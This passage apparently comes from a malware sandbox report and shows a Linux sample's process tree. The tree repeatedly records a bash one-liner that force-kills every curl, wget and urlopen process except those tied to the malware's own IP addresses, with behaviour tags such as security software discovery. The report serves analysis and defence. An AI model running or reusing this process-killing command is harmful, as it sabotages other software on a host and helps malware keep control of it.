    grep -v 192.157.86
    3⤵
    PID:3274
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3275
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3276
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3277
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3278
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3279
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3280
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3281
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3282
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3283
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3284
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3286
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3285
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3287
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3288
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  - Security Software Discovery
  PID:3289
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3291
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3290
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3292
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3293
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3294
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3295
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3296
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3297
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3298
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3299
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3301
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3300
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3302
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3303
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3304
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3305
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3306
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3307
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3308
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3309
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3310
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3311
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3312
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3313
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3314
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3315
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3316
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3317
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3318
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3320
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3319
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3321
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3322
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3323
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3325
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3324
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3326
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3327
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3328
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3329
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3330
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3331
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3333
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3332
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3334
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3335
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3336
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3337
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3339
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:3338
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3340
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3341
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3342
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3343
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3344
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3345
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3346
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3347
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3348
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3349
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3350
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3351
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3352
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3353
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3354
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3355
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3356
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3357
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3358
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3359
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3360
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3361
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3362
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3363
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3364
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3365
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3366
- - /usr/bin/ps
    ps aux
    3⤵
    - Checks CPU configuration
    PID:3367
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3368
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3369
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3370
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3371
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3372
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3373
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3374
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3375
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3376
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3377
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3378
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3379
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3380
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3381
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3382
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3383
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3384
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3385
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3386
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3388
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3387
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3389
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3390
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3391
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3392
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3393
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3394
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3395
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3396
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3397
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3398
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3399
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3401
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3400
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3402
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3403
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3404
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3405
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3406
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3407
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3408
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3409
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3411
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3410
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3412
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3413
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3414
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3415
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3416
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3418
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3417
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3419
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3420
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3421
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3422
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3423
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3424
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3425
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3426
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3427
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3428
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3429
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3430
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3431
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3432
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3433
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3434
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3437
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3436
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3438
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3435
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3439
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3440
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3442
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3441
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3443
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3444
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:3445
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3446
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3447
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3448
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3449
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3450
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3451
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3452
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3453
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3455
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3454
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3456
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3457
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3458
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3459
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3460
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3461
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3462
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3463
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3466
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3464
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3465
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3467
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3468
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3469
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3470
- - /usr/bin/grep
    grep curl
    3⤵
    PID:3471
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3472
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3473
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3474
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3475
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3476
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3477
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3478
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3479
- - /usr/bin/grep
    grep wget
    3⤵
    PID:3480
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3481
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3482
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3483
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3484
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3485
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3486
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3487
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3488
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:3489
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:3490
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:3491
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:3492
- - /usr/bin/ps
    ps aux
    3⤵
    PID:3493
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3494
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:3495
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:3496
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:3497
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:3498
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:3499